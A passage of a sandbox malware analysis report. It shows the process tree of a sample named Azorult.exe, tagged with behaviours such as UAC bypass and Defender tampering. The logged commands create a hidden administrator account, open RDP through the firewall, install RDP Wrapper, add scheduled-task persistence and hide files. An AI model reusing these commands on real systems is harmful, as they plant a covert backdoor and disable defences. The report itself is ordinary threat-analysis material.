                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7660,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=5580 /prefetch:8
                                                                                        2⤵
                                                                                          PID:668
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7960,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=5604 /prefetch:8
                                                                                          2⤵
                                                                                            PID:1308
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8112,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=7372 /prefetch:8
                                                                                            2⤵
                                                                                              PID:3124
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --always-read-main-dll --field-trial-handle=7924,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=7900 /prefetch:1
                                                                                              2⤵
                                                                                                PID:772
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6408,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=7632 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:3136
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8160,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=4932 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:1740
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3396,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=7444 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:4168
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3396,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=7444 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:3952
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --always-read-main-dll --field-trial-handle=8036,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=6548 /prefetch:1
                                                                                                        2⤵
                                                                                                          PID:2376
                                                                                                        • C:\Users\Admin\Downloads\Azorult.exe
                                                                                                          "C:\Users\Admin\Downloads\Azorult.exe"
                                                                                                          2⤵
                                                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                                                          • UAC bypass
                                                                                                          • Blocks application from running via registry modification
                                                                                                          • Drops file in Drivers directory
                                                                                                          • Checks computer location settings
                                                                                                          • Executes dropped EXE
                                                                                                          • Checks whether UAC is enabled
                                                                                                          • Modifies WinLogon
                                                                                                          • Hide Artifacts: Hidden Users
                                                                                                          • Drops file in Program Files directory
                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                          • System policy modification
                                                                                                          PID:3540
                                                                                                          • C:\ProgramData\Microsoft\Intel\wini.exe
                                                                                                            C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
                                                                                                            3⤵
                                                                                                            • Checks computer location settings
                                                                                                            • Executes dropped EXE
                                                                                                            • Modifies registry class
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            PID:1528
                                                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                                                              "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
                                                                                                              4⤵
                                                                                                              • Checks computer location settings
                                                                                                              PID:4140
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
                                                                                                                5⤵
                                                                                                                  PID:5956
                                                                                                                  • C:\Windows\SysWOW64\regedit.exe
                                                                                                                    regedit /s "reg1.reg"
                                                                                                                    6⤵
                                                                                                                    • UAC bypass
                                                                                                                    • Windows security bypass
                                                                                                                    • Hide Artifacts: Hidden Users
                                                                                                                    • Runs .reg file with regedit
                                                                                                                    PID:5044
                                                                                                                  • C:\Windows\SysWOW64\regedit.exe
                                                                                                                    regedit /s "reg2.reg"
                                                                                                                    6⤵
                                                                                                                    • Runs .reg file with regedit
                                                                                                                    PID:4524
                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                    timeout 2
                                                                                                                    6⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:4008
                                                                                                                  • C:\ProgramData\Windows\rutserv.exe
                                                                                                                    rutserv.exe /silentinstall
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:2056
                                                                                                                  • C:\ProgramData\Windows\rutserv.exe
                                                                                                                    rutserv.exe /firewall
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:2900
                                                                                                                  • C:\ProgramData\Windows\rutserv.exe
                                                                                                                    rutserv.exe /start
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:1644
                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                    ATTRIB +H +S C:\Programdata\Windows\*.*
                                                                                                                    6⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    • Views/modifies file attributes
                                                                                                                    PID:4056
                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                    ATTRIB +H +S C:\Programdata\Windows
                                                                                                                    6⤵
                                                                                                                    • Views/modifies file attributes
                                                                                                                    PID:4572
                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                    sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
                                                                                                                    6⤵
                                                                                                                    • Launches sc.exe
                                                                                                                    PID:5416
                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                    sc config RManService obj= LocalSystem type= interact type= own
                                                                                                                    6⤵
                                                                                                                    • Launches sc.exe
                                                                                                                    PID:696
                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                    sc config RManService DisplayName= "Microsoft Framework"
                                                                                                                    6⤵
                                                                                                                    • Launches sc.exe
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:5864
                                                                                                              • C:\ProgramData\Windows\winit.exe
                                                                                                                "C:\ProgramData\Windows\winit.exe"
                                                                                                                4⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Checks processor information in registry
                                                                                                                • Modifies registry class
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:4928
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
                                                                                                                  5⤵
                                                                                                                    PID:548
                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                      timeout 5
                                                                                                                      6⤵
                                                                                                                      • Delays execution with timeout.exe
                                                                                                                      PID:1788
                                                                                                              • C:\programdata\install\cheat.exe
                                                                                                                C:\programdata\install\cheat.exe -pnaxui
                                                                                                                3⤵
                                                                                                                • Checks computer location settings
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:5564
                                                                                                                • C:\ProgramData\Microsoft\Intel\taskhost.exe
                                                                                                                  "C:\ProgramData\Microsoft\Intel\taskhost.exe"
                                                                                                                  4⤵
                                                                                                                  • Checks computer location settings
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:5148
                                                                                                                  • C:\programdata\microsoft\intel\P.exe
                                                                                                                    C:\programdata\microsoft\intel\P.exe
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:5680
                                                                                                                  • C:\programdata\microsoft\intel\R8.exe
                                                                                                                    C:\programdata\microsoft\intel\R8.exe
                                                                                                                    5⤵
                                                                                                                    • Checks computer location settings
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Modifies registry class
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:2764
                                                                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                                                                      "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
                                                                                                                      6⤵
                                                                                                                      • Checks computer location settings
                                                                                                                      PID:5092
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
                                                                                                                        7⤵
                                                                                                                        • Checks computer location settings
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        • Modifies registry class
                                                                                                                        PID:1868
                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                          taskkill /f /im Rar.exe
                                                                                                                          8⤵
                                                                                                                          • Kills process with taskkill
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:2808
                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                          taskkill /f /im Rar.exe
                                                                                                                          8⤵
                                                                                                                          • Kills process with taskkill
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:436
                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                          timeout 3
                                                                                                                          8⤵
                                                                                                                          • Delays execution with timeout.exe
                                                                                                                          PID:4936
                                                                                                                        • C:\Windows\SysWOW64\chcp.com
                                                                                                                          chcp 1251
                                                                                                                          8⤵
                                                                                                                            PID:5260
                                                                                                                          • C:\rdp\Rar.exe
                                                                                                                            "Rar.exe" e -p555 db.rar
                                                                                                                            8⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:1820
                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                            taskkill /f /im Rar.exe
                                                                                                                            8⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            • Kills process with taskkill
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:1740
                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                            timeout 2
                                                                                                                            8⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            • Delays execution with timeout.exe
                                                                                                                            PID:3136
                                                                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                                                                            "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
                                                                                                                            8⤵
                                                                                                                            • Checks computer location settings
                                                                                                                            PID:4508
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
                                                                                                                              9⤵
                                                                                                                                PID:1740
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
                                                                                                                                  10⤵
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:5140
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
                                                                                                                                  10⤵
                                                                                                                                    PID:1708
                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                    netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
                                                                                                                                    10⤵
                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                    PID:4540
                                                                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                                                                    net.exe user "john" "12345" /add
                                                                                                                                    10⤵
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:4508
                                                                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                                                                      C:\Windows\system32\net1 user "john" "12345" /add
                                                                                                                                      11⤵
                                                                                                                                        PID:5232
                                                                                                                                    • C:\Windows\SysWOW64\chcp.com
                                                                                                                                      chcp 1251
                                                                                                                                      10⤵
                                                                                                                                        PID:436
                                                                                                                                      • C:\Windows\SysWOW64\net.exe
                                                                                                                                        net localgroup "Администраторы" "John" /add
                                                                                                                                        10⤵
                                                                                                                                          PID:1864
                                                                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                                                                            C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
                                                                                                                                            11⤵
                                                                                                                                              PID:1908
                                                                                                                                          • C:\Windows\SysWOW64\net.exe
                                                                                                                                            net localgroup "Administratorzy" "John" /add
                                                                                                                                            10⤵
                                                                                                                                              PID:4688
                                                                                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
                                                                                                                                                11⤵
                                                                                                                                                  PID:4960
                                                                                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                                                                                net localgroup "Administrators" John /add
                                                                                                                                                10⤵
                                                                                                                                                  PID:1772
                                                                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                    C:\Windows\system32\net1 localgroup "Administrators" John /add
                                                                                                                                                    11⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:548
                                                                                                                                                • C:\Windows\SysWOW64\net.exe
                                                                                                                                                  net localgroup "Administradores" John /add
                                                                                                                                                  10⤵
                                                                                                                                                    PID:5064
                                                                                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                      C:\Windows\system32\net1 localgroup "Administradores" John /add
                                                                                                                                                      11⤵
                                                                                                                                                        PID:5576
                                                                                                                                                    • C:\Windows\SysWOW64\net.exe
                                                                                                                                                      net localgroup "Пользователи удаленного рабочего стола" John /add
                                                                                                                                                      10⤵
                                                                                                                                                        PID:1948
                                                                                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                          C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
                                                                                                                                                          11⤵
                                                                                                                                                            PID:1968
                                                                                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                                                                                          net localgroup "Пользователи удаленного управления" John /add
                                                                                                                                                          10⤵
                                                                                                                                                            PID:4508
                                                                                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                              C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
                                                                                                                                                              11⤵
                                                                                                                                                                PID:2000
                                                                                                                                                            • C:\Windows\SysWOW64\net.exe
                                                                                                                                                              net localgroup "Remote Desktop Users" John /add
                                                                                                                                                              10⤵
                                                                                                                                                              • Remote Service Session Hijacking: RDP Hijacking
                                                                                                                                                              PID:3952
                                                                                                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
                                                                                                                                                                11⤵
                                                                                                                                                                • Remote Service Session Hijacking: RDP Hijacking
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:1592
                                                                                                                                                            • C:\Windows\SysWOW64\net.exe
                                                                                                                                                              net localgroup "Usuarios de escritorio remoto" John /add
                                                                                                                                                              10⤵
                                                                                                                                                                PID:436
                                                                                                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                  C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
                                                                                                                                                                  11⤵
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:5044
                                                                                                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                net localgroup "Uzytkownicy pulpitu zdalnego" John /add
                                                                                                                                                                10⤵
                                                                                                                                                                  PID:5420
                                                                                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                    C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
                                                                                                                                                                    11⤵
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    PID:4724
                                                                                                                                                                • C:\rdp\RDPWInst.exe
                                                                                                                                                                  "RDPWInst.exe" -i -o
                                                                                                                                                                  10⤵
                                                                                                                                                                  • Server Software Component: Terminal Services DLL
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Modifies WinLogon
                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:2124
                                                                                                                                                                  • C:\Windows\SYSTEM32\netsh.exe
                                                                                                                                                                    netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                                                                                                                    11⤵
                                                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                    PID:1864
                                                                                                                                                                • C:\rdp\RDPWInst.exe
                                                                                                                                                                  "RDPWInst.exe" -w
                                                                                                                                                                  10⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:3796
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
                                                                                                                                                                  10⤵
                                                                                                                                                                  • Hide Artifacts: Hidden Users
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:4032
                                                                                                                                                                • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                  net accounts /maxpwage:unlimited
                                                                                                                                                                  10⤵
                                                                                                                                                                    PID:2236
                                                                                                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                      C:\Windows\system32\net1 accounts /maxpwage:unlimited
                                                                                                                                                                      11⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:5280
                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                    attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
                                                                                                                                                                    10⤵
                                                                                                                                                                    • Sets file to hidden
                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                    PID:1112
                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                    attrib +s +h "C:\Program Files\RDP Wrapper"
                                                                                                                                                                    10⤵
                                                                                                                                                                    • Sets file to hidden
                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                    PID:5148
                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                    attrib +s +h "C:\rdp"
                                                                                                                                                                    10⤵
                                                                                                                                                                    • Sets file to hidden
                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                    PID:1868
                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                timeout 2
                                                                                                                                                                8⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                PID:1148
                                                                                                                                                        • C:\ProgramData\Microsoft\Intel\winlog.exe
                                                                                                                                                          C:\ProgramData\Microsoft\Intel\winlog.exe -p123
                                                                                                                                                          5⤵
                                                                                                                                                          • Checks computer location settings
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:1176
                                                                                                                                                          • C:\ProgramData\Microsoft\Intel\winlogon.exe
                                                                                                                                                            "C:\ProgramData\Microsoft\Intel\winlogon.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Checks computer location settings
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                            PID:644
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\876C.tmp\876D.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
                                                                                                                                                              7⤵
                                                                                                                                                                PID:112
                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
                                                                                                                                                                  8⤵
                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:460
                                                                                                                                                          • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                            C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                            5⤵
                                                                                                                                                            • Modifies visiblity of hidden/system files in Explorer
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                            • NTFS ADS
                                                                                                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                            PID:5920
                                                                                                                                                            • C:\Programdata\WindowsTask\winlogon.exe
                                                                                                                                                              C:\Programdata\WindowsTask\winlogon.exe
                                                                                                                                                              6⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                              PID:5748
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /C schtasks /query /fo list
                                                                                                                                                                7⤵
                                                                                                                                                                  PID:2036
                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                    schtasks /query /fo list
                                                                                                                                                                    8⤵
                                                                                                                                                                      PID:5972
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c ipconfig /flushdns
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:5644
                                                                                                                                                                    • C:\Windows\system32\ipconfig.exe
                                                                                                                                                                      ipconfig /flushdns
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Gathers network information
                                                                                                                                                                      PID:1592
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c gpupdate /force
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:4724
                                                                                                                                                                      • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                        gpupdate /force
                                                                                                                                                                        7⤵
                                                                                                                                                                          PID:2336
                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                      PID:4032
                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                      PID:664
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Drops file in Drivers directory
                                                                                                                                                                      PID:2728
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:5748
                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                          TIMEOUT /T 5 /NOBREAK
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                          PID:548
                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                          TIMEOUT /T 3 /NOBREAK
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                          PID:6040
                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                          TASKKILL /IM 1.exe /T /F
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                          PID:4960
                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                          TASKKILL /IM P.exe /T /F
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                          PID:4764
                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                          ATTRIB +H +S C:\Programdata\Windows
                                                                                                                                                                          6⤵
                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                          PID:5864
                                                                                                                                                                  • C:\programdata\install\ink.exe
                                                                                                                                                                    C:\programdata\install\ink.exe
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                    PID:3168
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c sc start appidsvc
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:5668
                                                                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                        sc start appidsvc
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                        PID:3576
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c sc start appmgmt
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:3144
                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                          sc start appmgmt
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          PID:2916
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
                                                                                                                                                                        3⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:4732
                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                          sc config appidsvc start= auto
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                          PID:1472
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
                                                                                                                                                                        3⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:5040
